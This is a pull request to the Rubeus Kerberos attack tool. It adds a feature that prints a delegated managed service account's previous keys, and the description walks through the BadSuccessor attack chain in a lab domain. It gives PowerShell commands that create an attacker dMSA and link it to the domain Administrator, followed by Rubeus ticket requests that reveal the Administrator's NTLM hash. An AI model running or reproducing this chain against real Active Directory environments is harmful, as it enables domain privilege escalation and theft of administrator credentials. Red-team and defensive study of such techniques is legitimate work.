### PR TITLE
add capability to print previous keys

### DIFF
--- a/Rubeus/lib/LSA.cs
+++ b/Rubeus/lib/LSA.cs
@@ -559,6 +559,12 @@ namespace Rubeus {
 
 
                     Console.WriteLine("{0}Current Keys for {1}: ({2}) {3}", indent, userName, etypeName, cKeyValue);
+
+                    string etypeName1 = Enum.GetName(typeof(Interop.KERB_ETYPE), dmsaCurrentKeys.previousKeys.encryptionKey.keytype);
+                    string cKeyValue1 = Helpers.ByteArrayToString(dmsaCurrentKeys.previousKeys.encryptionKey.keyvalue);
+
+
+                    Console.WriteLine("{0}Previous Keys for {1}: ({2}) {3}", indent, userName, etypeName1, cKeyValue1);
                 }
 
 
@@ -1585,3 +1591,4 @@ namespace Rubeus {
         #endregion
     }
 }
+


### PR DESCRIPTION
Added print option for previous keys found in TGS, including keys of preceding managed accounts. The full attack chain for BadSuccessor now prints the NTLM hash of the Preceding Managed Account as well.

### First create the dMSA account
```powershell
New-AdServiceAccount -Name "attacker_dmsa" -DNSHostName "lab.lazy" -Path "OU=Staff,DC=lab,DC=lazy" -CreateDelegatedServiceAccount -PrincipalsAllowedToRetrieveManagedPassword  "lazytitan"

$sid = (Get-ADUser -Identity "lazytitan").SID
$acl = Get-Acl "AD:\CN=attacker_dmsa,OU=Staff,DC=lab,DC=lazy"
$rule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $sid, "GenericAll", "Allow"
$acl.AddAccessRule($rule)
Set-Acl -Path "AD:\CN=attacker_dmsa,OU=Staff,DC=lab,DC=lazy" -AclObject $acl


Set-ADServiceAccount -Identity attacker_dmsa -Replace @{
    'msDS-ManagedAccountPrecededByLink' = 'CN=ADMINISTRATOR,CN=USERS,DC=LAB,DC=LAZY'
    'msDS-DelegatedMSAState' = 2
}

Get-ADServiceAccount -Identity attacker_dmsa -Properties msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState | Select-Object Name, msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState
```
### Get a TGT ticket for the account that created the dMSA account.

```powershell
.\Rubeus.exe asktgt /user:lazytitan /aes256:02F93F7E9E128C32449E2F20475AFCDFB6CC2B4444AC8FD0B02406AF018F75E5 /domain:lab.lazy /nowrap /ptt
```
### Request a TGS 
When requesting the TGS it will now print the previous NTLM hash for managed account as well. In this example, the hash of the Administrator.

```powershell
.\Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lazy /dmsa /opsec /ptt /nowrap  /ticket:<base64 ticket from previous>
```
<img width="1689" height="1554" alt="image" src="https://github.com/user-attachments/assets/64a74e94-25ec-42bb-96ca-45d65b5f28a2" />
